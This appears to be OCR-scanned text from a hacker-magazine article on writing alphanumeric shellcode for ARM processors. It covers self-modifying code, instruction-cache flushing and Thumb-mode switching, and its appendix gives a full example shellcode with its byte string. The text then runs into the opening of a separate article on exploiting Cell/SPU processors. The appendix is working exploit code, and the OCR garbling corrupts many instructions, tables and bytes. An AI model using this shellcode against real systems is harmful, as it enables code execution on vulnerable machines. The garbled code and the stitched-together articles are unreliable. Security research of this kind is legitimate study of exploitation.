-byte Oxe3, Oxa0, 0x80, Ox01 


In this short code fragment, we load the 0x80 and 0x01 bytes in 
register Rl, we XOR them with 384 (which results in the value 0), 
and we store the result back over the original instruction. This 
code has no null bytes in it anymore. 


----[ 2.7 The Instruction Cache 


ARM processors have an instruction cache which makes writing 
self-modifying code hard to do since all the instructions that are 
being executed will most likely already have been cached. The Intel 
architecture has a specific requirement to be compatible with 
self-modifying code and as such, will make sure that when code is 
modified in memory the cache that possibly contains those 
instructions is invalidated. ARM has no such requirement, which 
means that the instructions that have been modified in memory could 
be different from the instructions that are actually executed since 
they could have been cached. Given the size of the instruction cache 
( 
als 
W 


16kb on our processor), and the proximity of the modified 
nstructions it is very hard to write self-modifying shellcode 
ithout having to flush the instruction cache. 


One way of ensuring that we can bypass the instruction cache is to 
use the MCR instruction, which allows us to move a register to the 
system coprocessor and is alphanumeric. We can set a specific bit in 
a register and then move that register to the status register of the 
system coprocessor, allowing us to turn off the instruction cache. 
However, as we mentioned in section 2.3, this instruction is 
privileged before ARMv6. Because it is not usable in all shellcode 
as such, we will not discuss it. 


These cache issues and the fact that we can’t just turn off the 
cache are the reasons why the fact that the SWI instruction can be 
represented alphanumerically was essential: we can’t modify the SWI 
instruction in memory before flushing the cache, but we will need 
this instruction to perform a flush of the instruction cache. On 
ARM/Linux, the system call for a cache flush is 0x9F0002. None of 
t 
i 
c 
i 


hese bytes are alphanumeric and since they are issued as part of an 
nstruction this could result in a problem for our self-modifying 
ode. However, SWI generates a software interrupt and to the 
nterrupt handler, Ox9F0002 is actually data and as a result will 
not be read via the instruction cache, so if we modify the argument 
to SWI in our self-modifyign code, the argument will be read 
correctly. 


In non-alphanumeric code, we would flush the instruction cache with 
this sequence of operations: 


mov rO, #0 
mov rl; al 
mov C2; ) 


swi Ox9F0002 
Since these instructions generate a number of non-alphanumeric 


characters, we will need self-modifying code techniques to use this 
in the shellcode. 


----[ 2.8 Going to Thumb Mode 
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As discussed in section 1.5, we don’t need to go into Thumb mode 
to make our shellcode work, but it is more convenient since we only 
need to make 2 bytes alphanumeric per instruction rather than 4. 


Below is an example that will get us into Thumb mode: 


sub r6, pc, #-1 
bx r6 


However, the BX instruction is not alphanumeric, so we must 
overwrite our shellcode to execute the correct instruction. We must 
modify this instruction before executing the system call to flush 
the instruction cache. 


Below is the list of Thumb instructions and their constraints with 
respect to processor version and if it’s possible to display them 


alphanumerically. 
instruction version disqualifier 
ADC 
ADD (1) IZ:14-13 
ADD (2) 
ADD (3) IZ:14-13 
ADD (4) 
ADD (5) LO. 5 
ADD (6) LOe LS 
ADD (7) TOs 15 
AND Pattern is @ 
ASR (1) 1Z:14-13 
ASR (2) 
B (1) TOsS 
B (2) LOEES 
BIC LOR 
BKPT 5T+ I0:15 
BL TOS 
BLX (1) 5T+ IO:15 
BLX (2) oat I0:7 
BX 
CMN LOi7 
CMP (1) 
CMP (2) TO: 7 
CMP (3) 
CPS 6+ I0:7 
CPY 6+ 
EOR Pattern is @ 
LDMIA I0O:15 
LDR (1) 
LDR (2) 
LDR (3) 
LDR (4) I0O:15 
LDRB (1) 
LDRB (2) 
LDRH (1) LOs15 
LDRH (2) 
LDRSB 
LDRSH 
SL (1) IZ: 14-13 
iSL (2) LO. 27 
LSR (1) IZ: 14-13 
LSR (2) LOS “7 
MoV (1) IZ: 14,12 
MOV (2) IZ: 14-13 
MOV (3) 
MUL 
MVN 10:7 
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NEG 
ORR 
POP LOELUS 
PUSH LO215 
REV 6+ LOT15 
REV16 6+ TO: 15 
REVSH 6+ TOpS 
ROR I0:7 
SBC LO 7 
SETEND 6+ IO:15 
STMIA TLOrrS 
STR (1) 
STR (2) 
STR (3) LOSS 
STRB (1) 
STRB (2) 
STRH (1) T0:15 
STRH (2) 
SUB (1) IZ: 14-13 
SUB (2) 
SUB (3) IZ: 14-13 
SUB (4) TZ215 
SWI IZ:15 
SXTB 6+ IZ:15 
SXTH 6+ TASS 
TST 
UXTB 6+ LA215 
UXTH 6+ IZ:15 
If we remove instructions which are not available on all ARM 
architectures, can not be represented alphanumerically or 


require special hardware, and then group together the instructions 
with similar purposes, we get the following list of instructions 


HUNnNnOBZEZEZFrAwWPpyPPy 


DC: Add with Cary 

Add 

Arithmetic Shift Right 
Branch and Exchange 
Compare 

Load Register 

Move 

Multiply 

Negate 
.ogical Or 
Store Register 
Substract 

Test 


HO 


awWUe 


GHA ACOUEXKXNYE 


n 
HWADWAE 


As you can see we have a lot more instructions available in Thumb 
mode than we did in ARM mode. However there are many constraints on 
the use of these instructions. For every instruction we can only use 
specific registers or specific values. The constraints here are more 
esoteric than they are for ARM because of the limited size of 
instructions. We will go over each instructions and its 

limitations. 


—- ADC: 


Syntax: ADC <Rd>, <Rm> 
15) 724.13) 22> aed, VO! 9) 3B. a 6. S43: 120 


oO} 1] OJ] O| OJ O| O| 1] O} 21 Rm Rd 


Since bit 7 is set to 0 and bit 6 is set to one, we can use 

just about any low register for Rm and Rd, the only 

combination of registers that we must exclude is the use of RO as 
both Rm and Rd since that would result in 0x40 or an ’@’. 

The main problem with this instruction is that we must know the 
value of the carry flag as it will be added to the result of the 
addition. 
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-— ADD: There are seven versions of the thumb mode ADD instruction listed 
in the reference manual. We will refer to them as the reference 
manual does, i.e. ADD (1) to ADD (7). 
ADD (1), ADD (3), ADD (5), ADD (6) and ADD (7) can not be used 
because their first byte is not alphanumeric. 
This leaves us with: 


- ADD (2): add a constant value to a register 
Syntax: ADD <Rd>, #<imm_8> 
15 14 13 12 11 10 8/7 0 
QO} Of 1] 1] O Rd imm_8 


Rd can be any low register but imm_8 must follow the 
constraints of being alphanumeric: 
- 47 < imm_8 < 123 
—- imm_8 is not 58-64 or 91-96. 
- ADD (4): adds the value of two registers of which one or 
both must be a high register. 
Syntax: ADD <Rd>, <Rm> 
15 1413 12 1110 9 8 7 6 5 3° 20 


O} 1] O| O| Of 1] O| O| H1| H2 Rm Rd 


With Hl = 1 if Rd is a high register and H2 = 1 if Rm 

is a high register. 

In our case the destination register, Rd may not be a high 
register because that would set bit 7 of the instruction 
to 1. As a result, we can only use this instruction to add 
the contents of a high register to a low one. However 
since bit 7 must be 0 and bit 6 must be 1, we can’t use 
register R8 as Rm and RO as Rd together (i.e. we can’t do 
ADD r0O, r8) Since that would result in the second byte 
being an ’@’. In theory we could use this instruction to 
be able to add 2 low registers to each other, since for 
some registers th ncoding would still be alphanumeric, 
however the reference manual specifies that if both 
registers are low, then the result is unpredictable. So 
the behavior may vary from one processor version to the 
next. 


-— ASR: There are two versions of ASR, ASR (1) and (2) respectively. 
ASR (1) allows the shifting of a register by a constant, however 
this is not alphanumeric. So we must use the second version of 
this instruction, ASR (2), which shifts a register based on the 
value in another register. 
Syntax: ASR <Rd>, <RS> 
15) 14°13 12°17 10) 9° “8 Fh ©. -3. 2B. 0 


oO} 1] O| O| Of O| O| 1] O| O Rs Rd 


Since bits 7 and 6 of ASR are 0, the first 2 bits of Rs must be 1. 
This means that Rs must be either R6 or R7. 


—- BX: Syntax: BX <Rm> 
15 1413121110 9 8 7 6 5 3 2 0 


oO} 1] O| O| O| 1] TJ 1] O| H2 Rm SBZ 


The branch and exchange instruction can be used to enter ARM mode. 
This is useful if we have code which starts off in Thumb mode: 
since SWI is not alphanumeric in Thumb, we can’t flush the cache 
if we write self-modifying code. We can, however use the 

BX instruction to get into ARM mode, where the SWI instruction is 
alphanumeric. We discuss this in more detail below. 

If bit 6 is 0, we must have bits 5 and 4 set to 1, this means that 
we can only use R6 and R7 from the low registers. For the high 
registers we can use R9, R10, R11, R13, R14 and R15 
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-— CMP: There are thr versions of CMP: CMP (1) to CMP (3). CMP (2) is 
not alphanumeric. 
-— CMP (1) compares a register to an immediate. 
Syntax: CMP <Rn>, #<imm_8> 
15 14 13 12 11 10 87 0 


QO} Of 1] Of 1 Rn imm_8 


As with ADD (2), Rn can be any low register but imm_8 must 
follow the constraints of being alphanumeric: 
- 47 < imm_8 < 123 
— imm_8 is not 58-64 or 91-96. 
-— CMP (3) compares the value of two registers of which one or 
both must be a high register. 
Syntax: CMP <Rn>, <Rm> 
15 14 13 12 1110 9 8 7 6 5 3-2". 0 


O| 1] O|] O| OJ 1] O| 1] H1| H2 Rm Rd 


The same restrictions apply as for ADD. In our case Rn may not 
be a high register because that would set bit 7 of the 
instruction to 1. As a result, we can only use this instruction 
to compare the contents of a high register to a low one. 

As with ADD, Rm can not be R8 if Rn is RO and comparing 

two low registers is unpredictable. 


-— LDR: There are many versions of this instruction: LDR (1) to LDR (4), 
LDRB (1), LDRB (2), LDRH (1), LDRH (2), LDRSB and LDRSH. Of these, 
only LDR (4) and LDRH (1) are not alphanumeric. 
- LDR (1) Loads a word from memory address stored in a register 
into another register. A word offset of maximum 5 bits (i.e. the 
value is multiplied by 4) can be given to the register containing 
the memory address. 
Syntax: LDR <Rd>, [<Rn>, #<imm_5> * 4] 

L524. 135-027. 11. 0 Ox fo 132 & 2, 20) 


OL]. 2], Or ok imm_5 Rn Rd 


The constraints on register use in this case depend on the value 
of the immediate. However, we can conclude that in no cases can Rn 
and Rd both be RO at the same time. 

If imm_5 is uneven (i.e. bit 6 is set) , then all other registers 
can be used. However, if imm_5 is even (i.e. bit 6 is not set), 
then only R6 and R7 can be used as Rn. 

- LDR (2) does the same as LDR (1) except that the offset to the 
register containing the memory address to read from is stored ina 
register and as a result can be larger than 32. 

Syntax: LDR <Rd>, [<Rn>, <Rm>] 

15% WA AS 2s eds OT ¢9o> 285 6 6 cP 8S a2. 0 


QO), 1) OO; 2h Lp oy, 0 Rm Rn Rd 


Since bit 7 must be 0, Rm is already constrained to registers: RO, 
Rl, R4 and R5. However, if Rm is RO or R4, then Rn must be R6 

or R7. If Rm is R1 or R5 then Rn and Rd can not both be RO. 

- LDR (3) loads a word into a register based on an 8 bit offset 
from the program counter (PC). 

Syntax: LDR <Rd>, [PC, #<imm_8> * 4] 

154 es 2 ET EO B57 0 


QO} 1{ O|] Of 1 Rd imm_8 


As with ADD (2) and CMP (1) Rd can be any low register but 

imm_8 must follow the constraints of being alphanumeric. 

— LDRB (1) is essentially the same as LDR (1) except that it loads 
a byte from memory instead of a word. 

Syntax: LDRB <Rd>, [<Rn>, #<imm_5>] 
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-— MOV: 


— MUL: 


Wed Apr 26 09:43:46 2017 23 
15 14 13 12 11 10 


6°. "0. Be <2 “0 


imm_5 Rn Rd 


Similar restrictions apply, with the added restriction however 
that imm_5 must be lower than 12, because otherwise the first byte 
is larger than '2z’ 
bit 7 of the second byte will be set to one, so in reality it must 
be lower than 10 and not equal 7, 6, 2 or 3. 


(Ox7a). However, if imm_5 is 11 or 10, then 


is the same as LDR (2) except that it behaves like 


— LDRB (2) 
LDRB (1), i.e. it loads a byte instead of a word. 
Syntax: LDRB <Rd>, [<Rn>, <Rm>] 
1.5 WA TS Ty VEL OF. 98 8B" Ge 2b "Bae. 
O| 1! O| 1] 1] 1{ 0 Rm Rn Rd 


for LDR 
— LDRH 

halfwor 
Syntax: 


(2) 


(2) 


d 


app 


ly. 


Since the second byte is identical, the same restrictions as 


is the same as LDR (2) and LDRB (2), except it loads a 


(16 bits). 
LDRH <Rd>, 
15 14 13 12 11 10 


[<Rn>, <Rm>] 
OBS Gs BB 2 8 


O| 1 


0) 


0) 


1 Rm Rn Rd 


[The same restrictions as for LDR (2) and LDRB (2) apply. 


—- LDRSB is the same as LDRB (2), except that it interprets the 
byte that it loads as signed. 


Syntax: LDRSB <Rd>, [<Rn>, <Rm>] 
15 1413121110 9 8 6 5 3 2 0 
O| 1! O| 1] OO} It 21 Rm Rn Rd 

Again, the same restrictions apply as for LDRB(2). 


— LDRSH is the hal 
LDRSH <Rd>, [<Rn>, <Rm>] 
15 24.9372. 12.20 


Syntax: 


fword equivalent of LDRSB. 


9B. 6 Oo 3. 26 00 


O| 1 


0) 


1 Rm Rn Rd 


There ar 


thr 


but only MOV 
high registers. 


Syntax: 


MOV <Rd>, 


(3) 


[The same restrictions apply as for LDRB(2) and LDRH (2). 


versions of this instrction: MOV (1) to MOV (3), 


is 


15 14 13 12 11 10 


alphanumeric. MOV (3) moves to, from or between 


<Rm> 


9° 8 7 6) 9 St 2 30 


1| O| H1| H2 Rm Rd 


As with other instructions (ADD and CMP) that operate on high 
Rd can not be RO if Rm is R8 and using two low registers 
is unpredictable. 


register 


Syntax: 


Ss, 


MUL <Rd>, 


15° 14-03-12 11-10 


<Rm> 


io sO) 


Os) ab 


0) 


0) 


0) 


0) 


Lf) Al 202)" Rm Rd 


Since the second byte of MUL is identical to the second byte of the 
ADC instruction, 
I.e. the only limitation on registers is that we can’t use RO as 


both Rm 
valid. 


Syntax: 


NEG <Rd>, 


and Rd, 


it 


all 


15 14 13 12 11 10 


has the same limitations. 


other combinations with low registers are 


<Rm> 


9 5B. OP 26 ON Bx 2 10 
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oO} 1] OJ] O| OJ O| LI OO} Of} 1 Rm Rd 

The second byte of NEG is identical to the second bytes of MUL and 

ADC, so the same limitations apply. 

-— STR: As with LDR, there are many versions of STR: STR (1) to STR (3), 
STRB (1) and (2), STRH (1) and (2). However STR (3) and STRH (1) 
are not alphanumeric. 

-— STR (1) the complementary instruction to LDR (1) stores a word 
from a register to memory. As with LDR (1), it will take an 
immediate of 5 bytes that it multiplies by 4 and uses as offset 
for a base register that contains a memory address to write to. 
Syntax: STR <Rd>, [<Rn>, #<imm_5> * 4] 

15 14 13 12 11 10 @: [Oe Bo az 30 
O| 1] 1] O| O imm_5 Rn Rd 
The same limitations as with LDR (1) apply. 
- STR (2) is the complementary instruction to LDR (2). 
Syntax: STR <Rd>, [<Rn>, <Rm>] 
15 14 138 12 17.10 9 8 &€& &S 3 2 0 
O| 1! O| 1] O| Of O Rm Rn Rd 
Again, the same limitations as with LDR (2) apply. 
— STRB (1) is complementary to LDRB (1). 
Syntax: STRB <Rd>, [<Rn>, #<imm_5>] 
15 14 13 12 11 10 6: i BE 2 20 
OO} LI 2) Li -0 imm_5 Rn Rd 
Since bit 11 is 0, the limitations are less stringent than with 
LDRB (1). As such, the limitations of STR (1) apply rather than 
the ones of LDRB (1). 
— STRB (2) is complementary to LDRB (2) 
Syntax: STRB <Rd>, [<Rn>, <Rm>] 
1.5.04. 13 120 41 0N, C9" BGs Be 3 “2 20 
O| 1/ O| 1] OO} 1] O Rm Rn Rd 
The same limitations as with LDRB (2) apply. 
— STRH (2) is complementary to LDRH (2) 
Syntax: STRH <Rd>, [<Rn>, <Rm>] 
15 14 13°12 11.10 9 8 € 5 3. 2 °0 
O| 1/ O| 1] OO} Of 1 Rm Rn Rd 
The same limitations apply. 

— SUB: There are four versions of SUB, but only SUB (2) is alphanumeric. 

Syntax: SUB <Rd>, <imm_8> 
1) PA TS. 72. de 20. - <8: 7 0 
0| O dele 2 Rd imm_8 

Since the second byte of SUB (2) only contains an immediate, it has 

the same limitations as the second byte of ADD (2), CMP (1) and 

LDR(3). 

However, unlike in ADD (2), CMP (1) and LDR (3), we can’t use any 

register for Rd. Since the first 5 bits of SUB are 00111, this 

covers a range of 0x38 to O0x3f. However only 0x38 and 0x39 (the 
characters ’8’ and ’9’) are alphanumeric. This means that we can 
only use registers RO and Rl as Rd this SUB instruction. 

- TST: Syntax: TST <Rn>, <Rm> 

15 14 13 12 1110 9 8 7 6 5 3 2 0 
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| O| 1] O| O| Of Of 1] O| O| O| Rm Rn | 


Since bit 7 and 6 are both set to 0, this means that bits 5 and 4 
must be set to 1. This yields the following restrictions: 

-— Rm must be either: R6 or R7. 

- If Rm is R6, then Rn can be any other low register. 

- If Rm is R7, then Rn can only be RO or R11. 


An important instruction that is missing from the above list is the 
SWI instruction. To be able to get around the fact that SWI is not 
alphanumeric in Thumb mode, we overwrite it from ARM mode. However, 
unlike the SWI in ARM mode, the argument to SWI will not be used to 
determine the system call number that we want to call. Instead we 
must place the system call number into R7. Unlike in ARM mode, where 
we must add 0x900000 to the system call number, we can just place 
the number in R7 as is. 


An example of calling execve in ARM mode: 
SWI 0x90000b 

In Thumb mode: 
MOV r7, #0x0b 
SWI 48 


----[ 2.9 Going to ARM Mode 


For programs that we wish to exploit that are already running in 
Thumb mode, we still have a problem: we can’t write self-modifying 
code in Thumb mode because we can’t call SWI to perform a cache 
flush. However, since the BX instruction is alphanumeric in Thumb 
mode, we can use that instruction to get us into ARM mode where we 
can do all the cool stuff we’ve discussed above. Here is an example 
of a code snippet that gets us into ARM mode: 


BX pc 
ADD r7, #50 


We need the add instruction as a nop instruction because PC will 
point to the current instruction + 4. The BX pe instruction 
will be represented alphanumerically as 'G’’x’. 


—-[ 3. Conclusion 


This article shows that alphanumeric shellcode is realistic on the 

ARM processor, even though it is harder to generate because of the 
nature of the ARM processor. Any operation, including non-alphanumeric 
instructions, can be executed by writing self-modifying code and 
flushing the instruction cache. Consequently, alphanumeric shellcode 
is Turing complete. 


The thumb instruction set can be used, if available, to facilitate 
writing shellcode. Its denser instruction structure makes it somewhat 
easier to make it generate alphanumeric bytes. However, having access 
to the thumb instruction set is not required. 
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--[ A. Shellcode Appendix 


----[ A.0O Writable Memory 


For debugging purposes, it is convenient to execute the shellcode as a 
normal application, instead of injecting it into a buffer. However, if 
it’s compiled as a normal application, the code will be loaded in 
non-writable code memory. Since our shellcode is self-modifying, the 
application will first have to set the memory to writable before executing 
the code. This can be done with the following code fragment: 


- ARM 

# set the text section writable 
MOV r0, #32768 

MOV rl, #4096 

MOV r2, #7 

BL mprotect 


Of course, this is not necessary when the shellcode is injected through a 
buffer overflow. The memory that contains the buffer will always be 
writable. 


—----[ A.1 Example Shellcode 


In this example, the shellcode starts up, switches to thumb mode and 
executes the application "/execme". Some of the techniques presented 
here are: getting a known value into a register, modifying our own 


shellcode, flushing the instruction cache, and switching from ARM 
to Thumb. 
our shellcode starts here 
nops 
SUBPL r3, rl, #56 
SUBPL v3, vl, #56 
do not change these instructions 
we will use them to load a value 
into our register 
SUBPL v3, vl, #56 
SUBPL v3, vl, #56 
continue nops 
SUBPL v3, vl, #56 
SUBPL v3, vl, #56 
SUBPL v3, vl, #56 
SUBPL r3;} tl, #56 
SUBPL v3, vl, #56 
SUBPL v3, vl, #56 


NANNNNANNNANNNANNNNN WN 
c 


Wed Apr 26 
BPL £3, 1 56 
BPL r3, ri, 56 
BPL F305 A, 56 
BPL C3561, 56 
BPL E36 Fly 56 
BPL E3,° «1; 56 
BPL C35. 1; 56 
BPL 3;. El, 56 
BPL i ls om ed Be 56 
BPL 3,7. rl, 56 
BPL C350 EL; 56 
BPL £3 ° £1; 56 
BPL r3, vl, #56 
BPL F353. ele, 56 
BPL r3;. C1, 56 
BPL £37 1; 56 
BPL r3, ri, 56 
BPL C37, 56 


we can’t load dire 
PC so we must get 

we do this by subt 
from PC 


09:43:46 2017 


ctly from 
PC into r3 
racting 48 


SUBMI r3, pc, 48 
SUBPL r3, pc, #48 
load 56 into r3 
i\DRPLB r3, [xr3, #-48] 
LDRMIB r3, [xr3, #-48] 
Set r5 to -l 
update the flags: result is negative 
so we know we need MI from now on 
SUBMIS EO: 35 1. 
SUBPLS E57. 03; owl 
+ r7 to stackpointer 
SUBMI v7, SP, #48 
Set r3 to 0 
set positive flag 
SUBMIS £3; 63; 56 
set r4 to 0 
SUBPL r4, v3, +3, ROR #2 
Set r6 to 0 
SUBPL r6, r4, xr4, ROR #2 
store registers to stack 
STMPLED.. x7, {r0, 14, «rd,>-B6, -r8,) Lry* 
eS tO =124. 
SUBPL r5, v4, #121 
copy PC to r6 
SUBPL r6, PC, r5, ROR #2 
SUBPL r6, r6, +5, ROR #2 
SUBPL r6, r6, r5, ROR #2 
SUBPL r6, r6, +5, ROR #2 
SUBPL r6, r6, +5, ROR #2 
SUBPL r6, r6, +5, ROR #2 
SUBPL r6, r6, r5, ROR #2 
write 0 to SWI 0x414141 
becomes: SWI 0x410041 
OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSET 
STRPLB x3, [r6, #-100] 


27 
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put 56 back into r3 
we are positive after this 
EORPLS r3, v3, #56 


SUBPL P13 F383). HST 


write 9F to SWI 0x410041 
becomes SWI 0x9F0041 

we are negative after this 
EORPLS CO). 27; 80 
negative 
EORMIS ESy Pos 48 
fF OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSET 
STRMIB EO, [e6y-° #= 99) 


5 
x 


write 2 to SWI O0x9F0041 
becomes SWI 0x9F0002 
SUBMI r5, r3, #54 

STRMIB 15, [r6, #-101] 


write 0x16 to 0x41303030 
becomes 0x41303016 
positive 
EORMIS r5, v3, #66 
EORPLS x5, r5, #108 
OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSET 
STRPLB 55. [265 -89] 


3 


x 


write 2F to 0x41303016 
becomes 0x412F3016 
EORPLS r5, r3, #86 
EORPLS r5, r5, #65 
OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSET 
STRPLB r5, [xr6, #-87] 


5 


write FF to 0x412FFF16 
becomes O0x412FFF16 (BXPL r6) 
OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSET 
STRPLB agar r6, -88] 


r7 = -1 
set - rs. to -121 
SUBPL r3, ri, #120 
SUBPL r6, v6, r3, ROR #2 


write DF for swi to 0x3030 
becomes OxDF30 (SWI 48) 
becomes negativ 

ORPLS CO, ET 97 

RMIS P54 ED); 65 
OFFSET USED HERE 
I 
R 


F CODE CHANGES, CHANGE OFFSET 
MIB x5, [r6, #-73] 


Set positive flag 
EORMIS cr7, v4, #56 


load arguments for SWI 

COPS "0. 1 ash 20 

SUBPL r5, SP, #48 

We use LDMPLFA, because it’s one of the few instructions 
we can use to write to the registers RO to R2. 

Other instructions generate non-alphanumeric characters 
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LDMPLFA r5!, {r0, rl, r2, r6, x8, 


Set r7 to -l 
Negative after this 
SUBPLS EV p- BT HST 


This will become: 
SWIMI 0x9f0002 
SWIMI 0x414141 


Set positive flag again 
ORMIS r5, v4, #56 


cal 


set thumb mode 
SUBPL r6, pc, xr7, ROR #2 


this should be BXPL r6 

but in hex that’s 

Ox51 Ox2f Oxff 0x16, so we 
overwrite the 0x30 above 
-byte 0x30,0x30,0x30,0x51 


. THUMB 

-ALIGN 2 

We assume r2 is 0 before 
entering Thumb mode 


copy pe to r0 
mov r0, pe 


OFFSET USED HERE 
IF CODE CHANGES, CHANGE OFFSE 


we will write to r0+47 and r0+54 
(beginning of the string) 

add r0, #100 

sub r0O, #105 


set rl to 0 

mul rij. £2 

set rl tp 47 

add rik 97 

sub rl, 50 

store rl (’/’) at r0+47 
string becomes /execme2 
strb nly [roy al] 


set rl to 0 

mul hice NeanniayA 

set rl to 54 

add rl, #54 

store 0 at r0+54 

string becomes /execme\0 
strb r2, [rod, xl] 


set rl to 0 
mul Bhs 2 
set rl to -l 
add cl, #48 


sub rl, #49 
# set r7 to l 
neg ea pres ce 


set rl to 0 

mul el. 62 

set rl to 11 (Oxb), 

the exec system call code 
add vl, #65 


lr} 


misalign r0O to address of lexecme2 - 


47 


29 


12.txt 


sub rl, #54 


r7 = 1, 


mul Clg EL 


mul ri, £2 


97 
50 


add 
sub 


r0O, 
rO, 


This wil bec 
-byte 0x30,0x 


alignment 

add c7, #50 
our command 
-ascii "lexecm 
nops used fo 
add CT; 50 
add ey 50 


----[{ A.2 Resultin 


char shellcode[] = 
"\x52\x38\x30\x41 
"\x52\x38\x30\x41 
"\x52\x38\x30\x41 
"\x52\x38\x30\x41 
"\x52\x38\x30\x41 
"\x52\x38\x30\x41 


"\x52\x30\x30\x4 


"\x45\x39\x50\x53\x42\x39\x50\x53\x52\x%30\x70\x4 


"\x42\x63\x41\x4 
"\x52\x65\x61\x4 
"\x50\x65\x61\x4 
"\x55\x38\x30\x3 
"\x42\x63\x50\x4 
"\x42\x6c\x50\x3 
"\x52\x57\x50\x4 


"\x50\x61\x50\x37\x52\x41\x50\x35\x42\x49\x50\x4 


"\ x4 
"\ x4 


2\x30\x50\x4 
£\x38\x50\x3 


"\x30\x69\x38\x51\x43\x61\x31\x32\x39\x41\x54\x51\x4 


"\x54\x51\x43\x3 
"\ xd 
"\x6d\x65\x32\x3 


Wed Apr 26 09:43:46 2017 


our systemcall code must be in r7 
rl contains the code 


xecve) 


set rl to 0 (first parameter of 


ome: swi 48 


30 


This is a nop used for 


e2" 
r alignment 


g Bytes 


"\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 


£E\x42\x30\x30\x4 


3\x50\x64\x61\x4 
F\x50\x65\x61\x4 
6\x50\x65\x61\x4 
3\x52\x39\x70\x4 
6\x45\x36\x50\x4 
5\x52\x59\x50\x4 
6\x55\x58\x70\x4 


set r0O to beginning of the string 


4\x50\x71\x41\x4 
6\x50\x65\x61\x4 
6\x50\x65\x61\x4 


\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 L 
F\x52\x30\x30\x53\x55\x30\x30\x53" 


\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x41 
\x52\x38\x30\x4]1 


d\x42\x38\x30\x53" 


7\x59\x79\x50\x4 
6\x50\x65\x61\x4 


6\x50\x64\x30\x4 


4" 
6" 
6" 


3\x52\x50\x50\x37\x52\x30\x50\x35" 


3\x42\x65\x50\x4 


6\x4 


5\x42\x50\x33" 


6\x55\x56\x50\x33\x52\x41\x50\x35" 
7\x52\x63\x61\x46" 


6\x55\x78\x30\x4 


6\x4 


5\x38\x70\x34" 


d\x52\x47\x41\x35\x58\x39\x70\x57\x52\x41\x41\x41" 
£\x50\x30\x30\x30\x51\x78\x46\x64" 


4\x42\x67\x61\x4 


0\x31\x31\x39\x4 


2\x37\x32\x37"; 


80AR8 0AR8 0AR8 0AR80AR8 0AR80AR80AR8 0AR80AR80AR80A 
80AR8 0AR8 0AR80AR80AR8 0AR8 0AR80AR80ARO0OBO0ORO0S 


3\x36\x31\x42" 


£\x42\x51\x43\x41\x31\x36\x39\x4f£" 


[ EOF 


daDPgAGYyPDReaOPeaFPeaFkPeakPeakPeaFPeaFPd0FU803 
BP3B1P5RYPFUVP3RAP 5RWPFUXpFUx0GRcaFPaP7RAPSBIPF 
gaOPO000QOxFd01i80Cal29ATOCE61BTOQCO01190OBOCA1 690COCa02800271lexecme22727 


U00S!] 


3\x51\x43\x61\x30\x32\x38\x30\x30\x32\x37\x31\x65\x78\x65\x63" 


R80AR80AR80AR80AR80AR80A 
E9PSBIPSROPMB80SBCAC 
R9PCRPP7ROP5SBCPFE6PCBePF 
E8p4BOPMRGA5X9pW 


Fl UU DW 


RAAAO8P 4B 
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8 — Sources 


SSS Se [ 1 - Introduction 


This article is all about Cell Broadband Architecture Engine [1], a new 
hardware designed by a joint between Sony [2], Toshiba [3] and IBM [4]. 


As so, lots of architecture details will be explained, and also many 
development differences for this platform. 


The biggest differentiator between this article and others released about 
this subject, is the focus on the architecture exploitation and not the 
use of the powerful processor resources to break code [5] and of course, 
the focus in the differentiators of the architecture, which means the SPU 
(synergestic processor unit) and not in the core (PPU - power processor 
unit) [6], since the core is a small-modified power processor (which 
means, all shellcodes for Linux on Power will also works for the core and 
there is just small differences in the code allocation and stuffs like 
that). 


It’s important to mention that everything about Cell tries to focus in the 
Playstation3 hardware, since it’s cheap and widely deployed, but there is 
also big machines made with this processor [7], including the #1 in the 
list of supercomputers [8]. 


---[ 1.1 - Paper structure 


The idea of this paper is to complete the studies about Cell, putting all 
the information needed to do security research, focused in software 
exploitation for this architecture together. 


For that, the paper have been structured in two important portions: 


Chapter 2 will be all about the Cell Architecture and how to develop for 
this architecture. It includes many samples and explains the 
modifications done to Linux in order to get the best from this 
architecture. Also, it gives the knowledge needed in order to go further 
in software exploitation for this arch. Chapter 3 is focused in the 
exploitation of the SPU processor, showing the simple memory layout it has 
and how to write a shellcode for the purpose of gaining control over an 
application running inside the SPU. 


[ 2 Cell Broadband Engine Architecture 


From the IBM Research [9]: "The Cell Architecture grew from a challenge 
posed by Sony and Toshiba to provide power-efficient and cost-effective 
high-performance processing for a wide range of applications, including 
the most demanding consumer appliance: game consoles. Cell - also known as 
the Cell Broadband Engine Architecture (CBEA) - is an innovative solution 
whose design was based on the analysis of a broad range of workloads in 
areas such as cryptography, graphics transform and lighting, physics, 
fast-Fourier transforms (FFT), matrix operations, and scientific 
workloads. As an example of innovation that ensures the clients’ success, 
a team from IBM Research joined forces with teams from IBM Systems 
Technology Group, Sony and Toshiba, to lead the development of a novel 
architecture that represents a breakthrough in performance for consumer 
applications. IBM Research participated throughout th ntire development 
of the architecture, its implementation and its software enablement, 
ensuring the timely and efficient application of novel ideas and 
technology into a product that solves real challenges." 


It’s impossible to not get excited with this. A so ’powerful’ and 
versatile architecture, completely different from what we usually seen is 


13.txt Wed Apr 26 09:43:46 2017 3 


an amazing stuff to research for software vulnerabilities. Also, since 
it’s supposed to be widely deployed, there will be an infinite number of 
new vulnerabilities coming on in the near future. I wanted to exploit 
those vulnerabilities. 


---[ 2.1 - What is Cell 


As must be already clear to the reader, I’m not talking about phones here. 
Cell is a new architecture, which cames to solve some of the actual 
problems in the computer industry. 


It’s compatible with a well-known architecture, which are the Power 
Architecture, keeping most of it’s advantages and solving most of it’s 
problems (if you cannot wait until know what problems, go to 2.2.1 
section). 


---[ 2.2 - Cell History 
The focus of this section is just to give a timeline vision for the 
reader, not been detailed at all. 

The architecture was born from a joint between IBM, Sony and Toshiba, 
formed in 2000. 


hey opened a design center in March 2001, based in Austin, Texas (USA). 


= 


